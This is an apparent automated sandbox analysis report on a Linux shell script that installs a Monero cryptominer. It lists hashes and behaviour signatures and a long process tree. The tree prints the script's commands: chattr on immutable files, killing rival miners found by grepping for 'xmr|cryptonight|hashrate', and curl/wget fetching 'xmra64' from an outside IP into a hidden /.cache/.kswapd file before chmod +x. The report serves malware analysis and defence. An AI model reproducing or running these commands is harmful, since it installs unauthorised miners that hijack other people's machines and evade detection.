Analysis
-
max time kernel
121s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
30-06-2024 18:39
Static task
static1
Behavioral task
behavioral1
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Size
5KB
-
MD5
7b72cf30ac42c20f0a14b0b87425c00a
-
SHA1
74402152ac0f0c9dfed6f76975080ce1d0d4584d
-
SHA256
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
-
SHA512
1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
-
SSDEEP
96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
.kswapd, .kswapd
ioc | pid | process
/.cache/.kswapd | 1991 | .kswapd
/.cache/.kswapd | 2427 | .kswapd
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 TTPs 1 IoCs
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
description | ioc | process
File opened for modification | /usr/local/bin/.gCM8WmmCs9RAsj7u | 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Reads CPU attributes 1 TTPs 6 IoCs
Processes:
ps, ps, ps, ps, ps, ps
description | ioc | process
File opened for reading | /sys/devices/system/cpu/online | ps
File opened for reading | /sys/devices/system/cpu/online | ps
File opened for reading | /sys/devices/system/cpu/online | ps
File opened for reading | /sys/devices/system/cpu/online | ps
File opened for reading | /sys/devices/system/cpu/online | ps
File opened for reading | /sys/devices/system/cpu/online | ps
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
description | ioc | process
File opened for modification | /dev/shm/.gCM8WmmCs9RAsj7u | 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
description | ioc | process
File opened for modification | /tmp/.gCM8WmmCs9RAsj7u | 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
-
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh1⤵
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
-
/bin/unameuname -a2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep " rm does not remove dir"2⤵
-
/bin/rmrm --help2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep -i "Dump libcurl equivalent"2⤵
-
/usr/bin/curlcurl --help2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep -i "wgetrc "2⤵
-
/usr/bin/wgetwget --version2⤵
-
/usr/bin/trtr -dc A-Za-z0-92⤵
-
/usr/bin/headhead /dev/urandom2⤵
-
/usr/bin/shufshuf -i 4-16 -n 12⤵
-
/usr/bin/headhead -c 162⤵
-
/bin/rmrm -f /tmp/.gCM8WmmCs9RAsj7u2⤵
-
/bin/rmrm -f /tmp/.gCM8WmmCs9RAsj7u2⤵
-
/bin/rmrm -f /usr/local/bin/.gCM8WmmCs9RAsj7u2⤵
-
/bin/rmrm -f /dev/shm/.gCM8WmmCs9RAsj7u2⤵
-
/bin/rmrm -f /.gCM8WmmCs9RAsj7u2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/sleepsleep 1202⤵
-
/bin/mkdirmkdir -p /.cache/2⤵
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
-
/bin/chmodchmod 1755 /.cache/2⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi "java "2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -vi jenkins2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵
-
/usr/bin/headhead -n 12⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v python2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi bash2⤵
-
/bin/grepgrep -vi exim2⤵
-
/bin/grepgrep -v l02⤵
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵
-
/usr/bin/uniquniq2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/readlinkreadlink /proc/324/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/324/exe2⤵
-
/bin/readlinkreadlink /proc/330/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/330/exe2⤵
-
/bin/readlinkreadlink /proc/414/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/414/exe2⤵
-
/bin/readlinkreadlink /proc/420/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/420/exe2⤵
-
/bin/readlinkreadlink /proc/430/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/430/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/436/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/436/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/438/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/438/exe2⤵
-
/bin/readlinkreadlink /proc/446/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/446/exe2⤵
-
/bin/readlinkreadlink /proc/453/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/453/exe2⤵
-
/bin/readlinkreadlink /proc/476/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/476/exe2⤵
-
/bin/readlinkreadlink /proc/487/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/487/exe2⤵
-
/bin/readlinkreadlink /proc/494/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/494/exe2⤵
-
/bin/readlinkreadlink /proc/498/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/498/exe2⤵
-
/bin/readlinkreadlink /proc/510/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/510/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/512/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/512/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/516/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/516/exe2⤵
-
/bin/readlinkreadlink /proc/532/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/532/exe2⤵
-
/bin/readlinkreadlink /proc/533/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/533/exe2⤵
-
/bin/readlinkreadlink /proc/575/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/575/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/577/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/577/exe2⤵
-
/bin/readlinkreadlink /proc/599/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/599/exe2⤵
-
/bin/readlinkreadlink /proc/620/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/620/exe2⤵
-
/bin/readlinkreadlink /proc/621/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/621/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/665/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/665/exe2⤵
-
/bin/readlinkreadlink /proc/674/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/674/exe2⤵
-
/bin/readlinkreadlink /proc/681/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/681/exe2⤵
-
/bin/readlinkreadlink /proc/683/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/683/exe2⤵
-
/bin/readlinkreadlink /proc/692/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/692/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/696/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/696/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/720/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/720/exe2⤵
-
/bin/readlinkreadlink /proc/747/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/747/exe2⤵
-
/bin/readlinkreadlink /proc/758/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/758/exe2⤵
-
/bin/readlinkreadlink /proc/930/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/930/exe2⤵
-
/bin/readlinkreadlink /proc/957/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/957/exe2⤵
-
/bin/readlinkreadlink /proc/961/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/961/exe2⤵
-
/bin/readlinkreadlink /proc/966/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/966/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/969/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/969/exe2⤵
-
/bin/readlinkreadlink /proc/973/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/973/exe2⤵
-
/bin/readlinkreadlink /proc/1023/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1023/exe2⤵
-
/bin/readlinkreadlink /proc/1033/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1033/exe2⤵
-
/bin/readlinkreadlink /proc/1047/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1047/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1053/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1053/exe2⤵
-
/bin/readlinkreadlink /proc/1066/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1066/exe2⤵
-
/bin/readlinkreadlink /proc/1070/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1070/exe2⤵
-
/bin/readlinkreadlink /proc/1074/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1074/exe2⤵
- Attempts to change immutable files
- Reads runtime system information
-
/bin/readlinkreadlink /proc/1077/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1077/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1080/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1080/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1090/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1090/exe2⤵
-
/bin/readlinkreadlink /proc/1094/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1094/exe2⤵
-
/bin/readlinkreadlink /proc/1103/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1103/exe2⤵
-
/bin/readlinkreadlink /proc/1113/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1113/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1124/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1124/exe2⤵
-
/bin/readlinkreadlink /proc/1128/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1128/exe2⤵
-
/bin/readlinkreadlink /proc/1132/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1132/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1136/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1136/exe2⤵
-
/bin/readlinkreadlink /proc/1140/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1140/exe2⤵
-
/bin/readlinkreadlink /proc/1144/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1144/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1149/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1149/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1153/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1153/exe2⤵
-
/bin/readlinkreadlink /proc/1155/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1155/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1157/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1157/exe2⤵
-
/bin/readlinkreadlink /proc/1158/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1158/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1163/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1163/exe2⤵
-
/bin/readlinkreadlink /proc/1173/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1173/exe2⤵
-
/bin/readlinkreadlink /proc/1174/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1174/exe2⤵
-
/bin/readlinkreadlink /proc/1176/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1176/exe2⤵
-
/bin/readlinkreadlink /proc/1177/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1177/exe2⤵
-
/bin/readlinkreadlink /proc/1182/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1182/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1192/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1192/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1193/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1193/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1194/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1194/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1195/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1195/exe2⤵
-
/bin/readlinkreadlink /proc/1196/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1196/exe2⤵
-
/bin/readlinkreadlink /proc/1199/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1199/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1203/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1203/exe2⤵
-
/bin/readlinkreadlink /proc/1236/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1236/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1239/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1239/exe2⤵
-
/bin/readlinkreadlink /proc/1260/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1260/exe2⤵
-
/bin/readlinkreadlink /proc/1267/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1267/exe2⤵
-
/bin/readlinkreadlink /proc/1280/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1280/exe2⤵
-
/bin/readlinkreadlink /proc/1292/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1292/exe2⤵
-
/bin/readlinkreadlink /proc/1300/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1300/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1312/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1312/exe2⤵
-
/bin/readlinkreadlink /proc/1317/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1317/exe2⤵
-
/bin/readlinkreadlink /proc/1322/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1322/exe2⤵
-
/bin/readlinkreadlink /proc/1350/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1350/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1358/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1358/exe2⤵
-
/bin/readlinkreadlink /proc/1390/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1390/exe2⤵
- Reads runtime system information
-
/bin/readlinkreadlink /proc/1485/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1485/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1510/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1510/exe2⤵
-
/bin/readlinkreadlink /proc/1512/cwd2⤵
-
/bin/catcat /proc/1512/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
-
/bin/readlinkreadlink /proc/1513/cwd2⤵
-
/bin/catcat /proc/1513/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
-
/bin/readlinkreadlink /proc/1514/cwd2⤵
-
/bin/catcat /proc/1514/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
-
/bin/readlinkreadlink /proc/1558/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1558/exe2⤵
-
/bin/readlinkreadlink /proc/1563/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1563/exe2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep x86_642⤵
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra64 -o /.cache/.kswapd2⤵
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra64 -O /.cache/.kswapd2⤵
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
-
/bin/sleepsleep 1202⤵
-
/bin/mkdirmkdir -p /.cache/2⤵
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
-
/bin/chmodchmod 1755 /.cache/2⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -vi "java "2⤵
-
/bin/grepgrep -vi jenkins2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵
-
/usr/bin/headhead -n 12⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v python2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi bash2⤵
-
/bin/grepgrep -vi exim2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵
-
/bin/grepgrep -v eth02⤵
-
/usr/bin/uniquniq2⤵
-
/bin/readlinkreadlink /proc/324/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/324/exe2⤵
-
/bin/readlinkreadlink /proc/330/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/330/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/414/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/414/exe2⤵
-
/bin/readlinkreadlink /proc/420/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/420/exe2⤵
-
/bin/readlinkreadlink /proc/430/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/430/exe2⤵
-
/bin/readlinkreadlink /proc/436/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/436/exe2⤵
-
/bin/readlinkreadlink /proc/438/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/438/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/446/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/446/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/453/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/453/exe2⤵
-
/bin/readlinkreadlink /proc/476/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/476/exe2⤵
-
/bin/readlinkreadlink /proc/487/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/487/exe2⤵
-
/bin/readlinkreadlink /proc/494/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/494/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/498/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/498/exe2⤵
-
/bin/readlinkreadlink /proc/510/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/510/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/512/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/512/exe2⤵
-
/bin/readlinkreadlink /proc/516/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/516/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/532/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/532/exe2⤵
-
/bin/readlinkreadlink /proc/533/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/533/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/575/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/575/exe2⤵
-
/bin/readlinkreadlink /proc/577/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/577/exe2⤵
-
/bin/readlinkreadlink /proc/599/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/599/exe2⤵
- Attempts to change immutable files
- Reads runtime system information
-
/bin/readlinkreadlink /proc/620/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/620/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/621/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/621/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/665/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/665/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/674/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/674/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/681/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/681/exe2⤵
-
/bin/readlinkreadlink /proc/683/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/683/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/692/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/692/exe2⤵
- Reads runtime system information
-
/bin/readlinkreadlink /proc/696/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/696/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/720/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/720/exe2⤵
-
/bin/readlinkreadlink /proc/747/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/747/exe2⤵
-
/bin/readlinkreadlink /proc/758/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/758/exe2⤵
-
/bin/readlinkreadlink /proc/930/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/930/exe2⤵
-
/bin/readlinkreadlink /proc/957/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/957/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/961/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/961/exe2⤵
-
/bin/readlinkreadlink /proc/966/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/966/exe2⤵
-
/bin/readlinkreadlink /proc/969/exe2⤵
-
